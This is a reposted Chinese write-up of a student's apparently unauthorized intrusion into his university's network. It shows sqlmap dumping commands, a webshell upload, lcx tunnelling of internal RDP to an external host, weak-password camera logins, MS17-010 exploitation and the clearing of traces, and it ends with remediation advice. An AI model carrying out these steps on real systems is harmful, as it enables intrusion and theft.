您的位置:首页 > 理论基础 > 计算机网络

大家好,我是黑客H,我为M高校的网络安全带盐!

2017-06-28 14:58 573 查看
https://bbs.ichunqiu.com/thread-24157-1-1.html

黑客H是M高校的一名计算机专业学生,为了诠释神马叫闲的蛋疼,他决定测试下他们学校的网站安全系数,于是便有了下文

0x01信息收集

废话开篇:俗话说得好,基【计算机】佬不出门,便搞天下事!电脑在手,天下我有。

那么首先,让我们准备好泡面零食,然后摆好姿势优雅的开机,掏出收藏多年的工具开始扫描。“哈哈,终于扫描到能利用的漏洞了!”黑客H脸上漏出了微笑,此时他已经连续一周【还是闲的蛋疼】对目标网站进行了踩点并且收集了管理员的大部分信息,目标域名为******.edu.cn,旗下子站通过搜索引擎site:语法进行了抓取导出后进行了CMS快速识别。





“我X?竟然这么多是国徽和未知CMS,前功要尽弃了。。”黑客H懊恼的抽了根烟,“信息都收集的差不多了,子域名也拿到了,高校网站应该都是内网服务器映射到公网的,还差什么呢........嗯......注入?”

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

黑客H抱着侥幸的心理进行了批量注入扫描。

几分钟后,扫描器显示出了一条疑似存在SQL注入的链接
http://****.edu.cn/xxxxx.php?id=356
黑客H通过手工进行了简单的判断,认为该注入点可以利用,随后祭出SQLMAP执行命令:sqlmap.py -u ****.edu.cn/xxxxx.php?id=356



SQLMAP的回显另其为之一振“靠!高校类站点还有get注入,看来是我太高估了”

0x02攻击

黑客H随后执行了sqlmap.py -u ****.edu.cn/xxxxx.php?id=356
--dbms



回显更令黑客H兴奋,该数据库共有31张表(部分信息过于敏感,已做涂黑处理)

由于之前的信息收集,黑客H断定zy表一定是一个子站的表,于是执行命令sqlmap.py
-u ****.edu.cn/xxxxx.php?id=356 --dump -T admin -D zy

SQLMAP列出了admin表中的所有字段,其中包含经过MD5加密的密码,黑客H拿到密码后进行了解密,遗憾的是并没有解密成功,于是愤怒的他执行了qlmap.py
-u ****.edu.cn/xxxxx.php?id=356 --dump-all

然而下面的一幕令他崩溃



一共3073张表,由于这是高校网站,所以断定有学生数据,然而黑客H对这些数据不感兴趣,他的目标是服务器权限。

在经历耐心的等待3天后,以zy命名的文件夹下一个csv数据库文件引起了他的注意文件名称是:p8_admin_log.csv黑客H想:这不是代表admin用户登录日志的文件吗?打开看看吧,也许出奇迹呢

黑客H随即打开文件,搜索password后发现了明文密码



于是,他尝试用用户为admin,密码为today3#zy进行了登录



在清脆的ENTER键声后,后台界面呈现在他眼前



他翻了翻后台,找到了可以上传的位置,但是不能进行PHP文件上传,再进行了深入寻找后,发现了能自定义上传文件后缀的方法在上传模块里有个权限设置









于是,他顺利的通过文章传图处上传了php文件拿下了子站的webshell





webshell地址:http://****.*****.edu.cn/attachment/cms/item/2017_04/03_23/c6c1f25ca5cf62c1.php

由于没有上传失败等提示,他判断主机不存在WAF或杀软,于是他用菜刀连接了webshell并且执行了whoami命令



“system么。。。”沉思了下,执行了ipconfig命令



“10.8.4.12....看来之前的猜测是对的。”黑客H向服务器上传了lcx并进行了端口转发同时在菜刀内进行了提权操作。

内网IP划分:

A类 10.0.0.0--10.255.255.255 

B类 172.16.0.0--172.31.255.255 

C类 192.168.0.0--192.168.255.255
lcx转发原理:

LCX一直被一些骇客用来连接远程内网的肉鸡很少有被正用,由于内部主机没有公网ip,访问公网靠NAT,所以就算木马服务端处于监听状态也无法被外网主机所连接。有时候我们想访问家里的处于内部网络的主机,通常我们会想一些办法,如安装个TEAMVIEW程序,如果有小路由控制权限,也可以在上面做个NAT映射,如果你没有控制权限,还可以有第三种办法,就是用LCX,用木马连通的工作原理,不过前提是你要有一个有公网IP主机。

运行有公网ip的主机上:lcx.exe -listen 51 8080

运行被控制端上,也就是内网主机:lcx.exe -slave 公网主机IP 51 127.0.0.1 3389

(1)运行有公网ip的主机上:lcx.exe -listen 51 8080,在公网主机上监听端口51,等待远程内部主机连接,而后面的8080是本机将51端口收到的数据转给本机的8080或将8080收到的数据交给51端口转发。

(2)运行被控制端上的内网主机:lcx.exe -slave 公网主机IP 51 127.0.0.1 3389,该命令告诉程序要连接的公网地址与端口号,将程序收到的数据转交给本机的3389端口.

通信过程:

(1)内部主机使用本机内部ip随机端口连接公网主机ip端口51,通信成功并保持连接。(内部主机会经过NAT做IP与端口转换)

(2)当有主机访问公网ip与8080端口,程序将数据由8080转给51端口发送到已经建立连接的内部主机,内部主机程序把这份由随机端口获取到的数据转发给本机的3389,回流亦然。



然后,他向内网主机上传了RouterScan和HSCAN,前者用来扫描摄像头等IOT设备,后者用来扫描内网脆弱(弱口令)设备

Hscan扫描到了同网段有IIS6服务器,名称为JWCweb(服务器系统对应为windows2003)



他在网上找了下资料,发现IIS6有个写权限漏洞可以利用,并对10.8.1.15服务器进行了尝试,随后,他成功取得了一个webshell



结果令他大吃一惊:这台服务器是教务管理系统(正方)所在服务器

然而服务器进程中发现了安全狗相关进程,放弃了提权操作,这时routerscan扫描到10.4.*网段时,发现了大批DVR设备



黑客H随便挑了个网址用弱密码登陆后发现是M校的摄像头





然后他又发现了DSS(大华安防平台)、海康威视备份系统服务器、电费记录平台等大量设备







在DSS平台用弱口令(admin)登陆后,发现能控制所有摄像头



由于routerscan设置的同时扫描445端口,在扫描列表中也出现了大批次暴露445端口的设备



黑客H微微一笑,将电脑网络切换到校园内网并且开启了虚拟机中的kali linux,由于系统很长时间没有更新过,所以先执行了apt-get update&apt-get upgrade、apt-get dist-upgrade 经过漫长的等待后,kalilinux更新完成,他开启了MSF,搜索MS17-010(详细教程见Demon表哥:
https://bbs.ichunqiu.com/thread-23005-1-1.html



他先用了扫描模块进行了扫描



然后用了攻击模块,成功的得到了一个shell并且成功提权



然后他看了下这台主机的访问日志





“尼玛。。。这管理员口味够重的。。。”随后黑客H成功连接了该服务器,看了看配置和网站后,他擦擦屁股(清理痕迹后)走人,第二天将详细过程提交到了M高校有关部门



0x03反思与总结

1、黑客H之所以能成功入侵M高校网站,原因有3:

(1)、M高校运维管理人员对网站安全、服务器安全的不重视,使其能轻而易举的拿到webshell并且以system权限执行命令

(2)、M高校对windows系统零日漏洞不重视,使黑客H能在补丁发布后的3个月后依旧能顺利拿下内网34台服务器。

(3)、内网环境

2、解决方案

1、服务器安装防护软件(如安全狗等),定期扫描影响网站运行的安全漏洞(如用AWVS等软件)

2、跟群里在企业的运维了解后,案例中的事件不在少数,尽快打补丁或关闭445、137、139等高危端口(卸载网络客户端、文件共享服务)

1、关闭445、139等端口,方法详见:http://mp.weixin.qq.com/s/7kArJcKJGIZtBH1tKjQ-uA

2、下载并更新补丁,及时修复漏洞(目前微软已经紧急发布XP、Win8、Windows server2003等系统补丁,已经支持所有主流系统,请立即更新)。

XP、Windows Server 2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、Windows Server 2008、Windows 10, Windows Server 2016等系统访问: https://technet.microsoft.com/zh ...
urity/ms17-010.aspx

3、内网做网段隔离,如果一台主机被攻破,这将是保护网络设施的最后一道防线

4、国徽CMS(PHP168)厂商在源码中应进行文件后缀名过滤、登录密码写入数据库时应进行加密处理,避免明文出现

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航